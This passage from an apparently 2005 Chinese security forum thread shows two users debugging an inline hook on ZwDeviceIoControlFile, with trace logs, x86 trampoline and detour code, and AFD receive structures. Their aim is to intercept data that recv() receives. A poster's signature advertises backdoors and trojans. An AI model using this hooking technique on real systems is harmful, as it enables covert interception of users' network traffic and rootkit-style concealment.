ntdevioctrl:670 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:680 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:690 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:780 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:790 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7dc 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7ec 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7fc 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:814 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:824 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:834 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:87c 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:88c 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:678 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:688 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:778 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:788 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:798 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7e4 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7f4 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:81c 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:82c 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:874 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:884 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:894 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:8b0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f27dfc f27dfc 12083 104fcc8 44 11e9b8 840
invoke result:103
ntdevioctrl:8b4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f27f54 f27f54 12083 104fcc8 44 11f390 840
invoke result:103
ntdevioctrl:8b8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f280ac f280ac 12083 104fcc8 44 11fd30 840
invoke result:103
ntdevioctrl:8bc 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28204 f28204 12083 104fcc8 44 1207e0 840
invoke result:103
ntdevioctrl:8c0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2835c f2835c 12083 104fcc8 44 121290 840
invoke result:103
ntdevioctrl:8c4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f284b4 f284b4 12083 104fcc8 44 12f008 840
invoke result:103
ntdevioctrl:8c8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2860c f2860c 12083 104fcc8 44 12f850 840
invoke result:103
ntdevioctrl:8cc 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28764 f28764 12083 104fcc8 44 1302b0 840
invoke result:103
ntdevioctrl:8d0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f288bc f288bc 12083 104fcc8 44 130d60 840
invoke result:103
ntdevioctrl:8d4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28a14 f28a14 12083 104fcc8 44 131700 840
invoke result:103
ntdevioctrl:8d8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28b6c f28b6c 12083 104fcc8 44 1320a0 840
invoke result:103
ntdevioctrl:8dc 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28cc4 f28cc4 12083 104fcc8 44 132a40 840
invoke result:103
ntdevioctrl:8e0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28e1c f28e1c 12083 104fcc8 44 1333e0 840
invoke result:103
ntdevioctrl:8e4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28f74 f28f74 12083 104fcc8 44 133d80 840
invoke result:103
ntdevioctrl:8e8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f290cc f290cc 12083 104fcc8 44 134720 840
invoke result:103
ntdevioctrl:8ec 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29224 f29224 12083 104fcc8 44 1350c0 840
invoke result:103
ntdevioctrl:8f0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2937c f2937c 12083 104fcc8 44 135a60 840
invoke result:103
ntdevioctrl:8f4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f294d4 f294d4 12083 104fcc8 44 136400 840
invoke result:103
ntdevioctrl:8f8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2962c f2962c 12083 104fcc8 44 136da0 840
invoke result:103
ntdevioctrl:8fc 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29784 f29784 12083 104fcc8 44 137740 840
invoke result:103
ntdevioctrl:900 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f298dc f298dc 12083 104fcc8 44 1380e0 840
invoke result:103
ntdevioctrl:904 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29a34 f29a34 12083 104fcc8 44 138a80 840
invoke result:103
ntdevioctrl:908 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29b8c f29b8c 12083 104fcc8 44 139420 840
invoke result:103
ntdevioctrl:90c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29ce4 f29ce4 12083 104fcc8 44 139dc0 840
invoke result:103
ntdevioctrl:910 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29e3c f29e3c 12083 104fcc8 44 13a760 840
invoke result:103
ntdevioctrl:914 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29f94 f29f94 12083 104fcc8 44 13b100 840
invoke result:103
ntdevioctrl:918 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a0ec f2a0ec 12083 104fcc8 44 13baa0 840
invoke result:103
ntdevioctrl:91c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a244 f2a244 12083 104fcc8 44 13c440 840
invoke result:103
ntdevioctrl:920 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a39c f2a39c 12083 104fcc8 44 13cde0 840
invoke result:103
ntdevioctrl:924 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a4f4 f2a4f4 12083 104fcc8 44 13d780 840
invoke result:103
ntdevioctrl:928 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a64c f2a64c 12083 104fcc8 44 13e120 840
invoke result:103
ntdevioctrl:92c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a7a4 f2a7a4 12083 104fcc8 44 13eac0 840
invoke result:103
ntdevioctrl:930 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a8fc f2a8fc 12083 104fcc8 44 13f460 840
invoke result:103
ntdevioctrl:934 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2aa54 f2aa54 12083 104fcc8 44 13fe00 840
invoke result:103
ntdevioctrl:938 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2abac f2abac 12083 104fcc8 44 1407a0 840
invoke result:103
ntdevioctrl:93c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2ad04 f2ad04 12083 104fcc8 44 141140 840
invoke result:103
ntdevioctrl:940 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2ae5c f2ae5c 12083 104fcc8 44 141ae0 840
invoke result:103
ntdevioctrl:944 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2afb4 f2afb4 12083 104fcc8 44 142480 840
invoke result:103
ntdevioctrl:948 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2b10c f2b10c 12083 104fcc8 44 142e20 840
invoke result:103
ntdevioctrl:94c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2b264 f2b264 12083 104fcc8 44 1437c0 840
invoke result:103
ntdevioctrl:800 0 0 f25f14 f25f14 1201f 104f9f0 10 0 0
invoke result:0
ntdevioctrl:800 8ac 0 0 104fd90 12017 104fd80 10 0 0
invoke result:103
ntdevioctrl:800 8ac 0 0 104fb9c 12037 104fbac 4 104fba4 8
invoke result:0
ntdevioctrl:800 8ac 0 0 104fba4 12037 104fbb4 4 104fbac 8
invoke result:0
ntdevioctrl:800 8ac 0 0 104fbbc 12047 104fab8 d4 0 0
invoke result:0
ntdevioctrl:800 8ac 0 0 104fbd8 12047 104fad4 d4 0 0
invoke result:0
ntdevioctrl:800 8ac 0 0 104fc88 1202b 104fc78 10 0 0
invoke result:0
ntdevioctrl:800 8ac 0 0 104fbe0 12037 104fbf0 4 104fbe8 8
invoke result:0
ntdevioctrl:800 8ac 0 0 104fd40 12047 104fc3c d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f25f14 f25f14 12083 104fcc0 44 111098 840
invoke result:103
其中并没有以 0x00012017 作为第六个参数的调用。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
tombkeeper
 

发表于:2005-03-15 17:00  

 
发帖: 3234
积分: 11
注册: 2001-09-20
 
00012017是recv函数最终使用的,完成端口是不是也用这个我就不能确定了,等有空了我再找个完成端口的应用来看看。

NtDeviceIoControlFile调用的频度远比你想象的要多,你这样全部打印很可能会漏掉关键的那个数据接收的调用。
---
我寒不能怨人傻
人傻不能怨政府

 
baiyuanfan
 

发表于:2005-03-15 17:01  

 
发帖: 317
积分: 0
注册: 2004-01-22
 
status = NtDeviceIoControlFile(
                 (HANDLE)Handle,
                 event,
                 apcRoutine,
                 apcContext,
                 ioStatusBlock,
                 IOCTL_AFD_RECEIVE,
                 &recvInfo,
                 sizeof(recvInfo),
                 NULL,
                 0
                 );
因为我们已知recv调用时最后两个参数为0,就加上这个条件做了个过滤。奇怪的是这次出现了 0x00012017:
ntdevioctrl:964 0 0 f2b264 f2b264 1201f 104f9f0 10 0 0
invoke result:0
ntdevioctrl:964 14c 0 0 104fd90 12017 104fd80 10 0 0
invoke result:103
ntdevioctrl:964 14c 0 0 104fbbc 12047 104fab8 d4 0 0
invoke result:0
ntdevioctrl:964 14c 0 0 104fbd8 12047 104fad4 d4 0 0
invoke result:0
ntdevioctrl:964 14c 0 0 104fc88 1202b 104fc78 10 0 0
invoke result:0
ntdevioctrl:964 14c 0 0 104fd40 12047 104fc3c d4 0 0
invoke result:0
疑惑中。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
tombkeeper
 

发表于:2005-03-15 17:05  

 
发帖: 3234
积分: 11
注册: 2001-09-20
 
NtDeviceIoControlFile是被循环调用的,其调用频度远超过Windows 控制台子系统屏幕输出的速度,你如果不加过滤条件,基本上得到的都是那些循环的输出。

你以0x00012017作为过滤条件。然后打印*(char *)(*(DWORD *)recvInfo + sizeof(DWORD)) 不就明白这个值是否正确了么。
---
我寒不能怨人傻
人傻不能怨政府

 
baiyuanfan
 

发表于:2005-03-15 17:09  

 
发帖: 317
积分: 0
注册: 2004-01-22
 
不是控制台,我是log到文件。
// Inline (detour) hook pair for ZwDeviceIoControlFile, MSVC __asm syntax, x86-32.
// oriZwDeviceIoControlFile is the trampoline: its bytes are presumably overwritten
// at run time with the displaced head of the real API plus a jmp back into it
// (the installer is not shown in this post).  myZwDeviceIoControlFile is the
// detour the patched API entry jumps to.  Note there is no filter on the
// IoControlCode: every call is logged synchronously, which is why the trace is
// dominated by unrelated requests.  An exported ntdll stub whose first bytes
// jump outside the module is also exactly what hook scanners and integrity
// checks look for.
oriZwDeviceIoControlFile:  // offset 0x103 (author's note)
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
// 15 bytes of nop reserved for the displaced instructions of the real API
// (the author expects 15 to cover any prologue spanning the 5-byte jmp)
__emit 0xe9
__emit 0
__emit 0
__emit 0
__emit 0
// e9 + rel32: jmp whose displacement is patched at run time so execution
// continues in the real API right after the displaced bytes
    
myZwDeviceIoControlFile:  // detour entry; reached with the caller's return address on the stack
//int 3   (debugger breakpoint, left disabled)
push ebp
mov ebp,esp                      // frame: the 10 DWORD arguments are at [ebp+8]..[ebp+0x2c]
// Re-push all 10 arguments in reverse order so the callee sees the same
// layout the original caller built.
push [ebp+0x2c]
push [ebp+0x28]
push [ebp+0x24]
push [ebp+0x20]
push [ebp+0x1c]
push [ebp+0x18]
push [ebp+0x14]
push [ebp+0x10]
push [ebp+0x0c]
push [ebp+0x08]
call dbglog10                    // logs the 10 args; nothing is popped afterwards, so dbglog10 must be stdcall (cleans 40 bytes) -- confirm
push [ebp+0x2c]
push [ebp+0x28]
push [ebp+0x24]
push [ebp+0x20]
push [ebp+0x1c]
push [ebp+0x18]
push [ebp+0x14]
push [ebp+0x10]
push [ebp+0x0c]
push [ebp+0x08]
call oriZwDeviceIoControlFile    // real API via the trampoline; NTSTATUS comes back in eax
push eax                         // one copy preserves the NTSTATUS across the log call
push eax                         // the other is dbglog01's argument
call dbglog01                    // stack balances only if dbglog01 pops exactly one DWORD (stdcall) -- confirm
pop eax                          // restore the NTSTATUS for the caller
pop ebp
ret 28h                          // stdcall return: drop the caller's 10 args (0x28 bytes), NtDeviceIoControlFile's arity
必须等log结束,ntdevioctrl才能继续执行
我log的结果不全,难道是因为log的速度没有ntdevioctrl调用的速度快?应该不会吧

baiyuanfan 编辑于 2005-03-15 17:11
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
tombkeeper
 

发表于:2005-03-15 17:24  

 
 
计算机的美好之处在于0就是0,1就是1,铁板钉钉。说什么都没意义,你把0x00012017的时候缓冲区里面的数据打印出来就清楚了。
---
我寒不能怨人傻
人傻不能怨政府

 
baiyuanfan
 

发表于:2005-03-15 17:32  

 
 
我倒是觉得12047很多,比较有可能,呵呵。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
tombkeeper
 

发表于:2005-03-15 17:34  

 
 

引用 (baiyuanfan @ 2005-03-15 17:32)
我倒是觉得12047很多,比较有可能,呵呵。


你是准备继续喋喋不休下去呢,还是写个代码测试一下?
---
我寒不能怨人傻
人傻不能怨政府

 
baiyuanfan
 

发表于:2005-03-15 17:36  

 
 
写了,测了。
ntdevioctrl:94c 8ac 0 0 104fd90 12017 104fd80 10 0 0
invoke result:103
唯一的一个12017调用返回是pending!老大。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
tombkeeper
 

发表于:2005-03-15 17:46  

 
 
我也郁闷了。这段东西给你参考一下:

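/* Request encoding and structures for the AFD (afd.sys) receive path that
 * recv() reaches through NtDeviceIoControlFile.  Layouts mirror the public
 * Winsock/NT definitions.  Fix relative to the posted version: the macro line
 * continuation was a forward slash, which is not a continuation character and
 * leaves _AFD_CONTROL_CODE expanding to nothing. */
#define AFD_RECEIVE             5
#define METHOD_NEITHER          3
#define FILE_DEVICE_NETWORK     0x00000012

#define FSCTL_AFD_BASE          FILE_DEVICE_NETWORK
/* FSCTL_AFD_BASE occupies bits 12 and up, the request number is shifted into
 * bits 2 and up, and the transfer method sits in the low two bits.  Arguments
 * are parenthesised so an expression passed as `request` keeps its value. */
#define _AFD_CONTROL_CODE(request,method) \
                ((FSCTL_AFD_BASE)<<12 | ((request)<<2) | (method))

/* 0x12<<12 | 5<<2 | 3 == 0x00012017, the IoControlCode seen in the trace. */
#define IOCTL_AFD_RECEIVE       _AFD_CONTROL_CODE( AFD_RECEIVE, METHOD_NEITHER )

/* Scatter/gather element: same layout as Winsock's WSABUF (length, then data). */
typedef struct _WSABUF {
    ULONG len;
    PCHAR buf;
} WSABUF, *LPWSABUF;

/* InputBuffer of IOCTL_AFD_RECEIVE: the caller's WSABUF array plus flags.
 * Received bytes land in BufferArray[i].buf. */
typedef struct _AFD_RECV_INFO {
    LPWSABUF BufferArray;       /* array of BufferCount WSABUFs */
    ULONG BufferCount;
    ULONG AfdFlags;
    ULONG TdiFlags;
} AFD_RECV_INFO, *PAFD_RECV_INFO;

/* Completion record written by the I/O manager: final Status (or a pointer in
 * the reserved alias) and Information, the byte count for a completed transfer. */
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        NTSTATUS Status;
        PVOID Pointer;
    };

    ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

/* Optional completion callback (APC) passed as the ApcRoutine argument. */
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);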
---
我寒不能怨人傻
人傻不能怨政府

 
baiyuanfan
 

发表于:2005-03-15 17:52  

 
 
这个是NT源代码??
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
tombkeeper
 

发表于:2005-03-16 11:22  

 
 
用上面的宏,printf ("%.8x",IOCTL_AFD_RECEIVE)出来的就是00012017,和我调出来的结果是一致的。我实际测试也确实得到了接收到的数据。
---
我寒不能怨人傻
人傻不能怨政府

 
baiyuanfan
 

发表于:2005-03-16 15:46  

 
 
加过滤条件第六个参
